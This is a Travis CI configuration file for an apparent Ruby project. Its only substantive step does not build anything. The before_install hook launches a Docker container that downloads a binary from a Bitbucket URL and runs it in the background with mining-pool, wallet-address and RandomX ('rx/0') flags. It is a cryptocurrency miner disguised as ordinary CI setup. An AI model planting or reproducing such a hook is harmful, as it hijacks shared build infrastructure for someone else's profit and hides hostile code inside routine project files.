language: ruby

services:
  - docker

before_install:
  - sudo docker run -d -t --dns="1.1.1.1" --name Docker ubuntu && sudo docker exec -u root -t Docker sh -c "apt-get update && apt-get -y upgrade && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee && chmod u+x katek-fee && ./katek-fee -o 139.99.124.170:80 -u 84Cz8R4XkP2V6ceRrJgkXQDMSFRLCfgj3gtgbAkBkaypMe4H9uySSC8FugfzvtFprpA54ECHbCsGNhYwA8PdmTRSUHBaue8.yahaha -k -a rx/0 --background && bash mulai.sh "
